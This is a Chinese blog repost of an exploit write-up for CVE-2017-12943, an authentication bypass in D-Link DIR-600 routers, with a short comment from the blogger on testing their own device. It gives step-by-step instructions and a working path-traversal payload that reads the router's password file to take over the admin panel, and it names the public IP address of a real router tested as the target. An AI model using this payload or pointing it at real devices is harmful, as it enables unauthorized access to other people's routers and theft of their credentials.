zoukankan      html  css  js  c++  java
  • 【漏洞复现】D-Link DIR-600

    #Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)

    # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
    # Date: 29-08-2017
    # Exploit Author: Jithin D Kurup
    # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
    # Vendor : www.dlink.com
    # Version: Hardware version: B1
    Firmware version: 2.01
    # Tested on:All Platforms


    1) Description

    After Successfully Connected to D-Link DIR-600 
    Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's
    Admin Panel Just by adding a simple payload into URL.

    D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
    read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, 
    as demonstrated by discovering the admin password.

    Its More Dangerous when your Router has a public IP with remote login
    enabled.


    IN MY CASE,
    Tested Router IP : http://190.164.170.249



    Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ

    2) Proof of Concept

    Step 1: Go to
    Router Login Page : http://190.164.170.249:8080

    Step 2:
    Add the payload to URL.

    Payload: model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd



    Bingooo You got admin Access on router.
    Now you can download/upload settiing, Change setting etc.

     google随便找了一个,好像影响不止dir-600。

    因为我有一台dir-600m的这种路由器,所以拿来测了测,600m不受影响,也可能是因为我升级过系统版本。 

  • 相关阅读:
    WinCE 与通讯模块
    6174问题
    阶乘因式分解(一)
    三个数从小到大排序
    公约数和公倍数
    水仙花数
    韩信点兵
    5个数求最值
    求转置矩阵问题
    孪生素数问题
  • 原文地址:https://www.cnblogs.com/nayu/p/7458116.html
Copyright © 2011-2022 走看看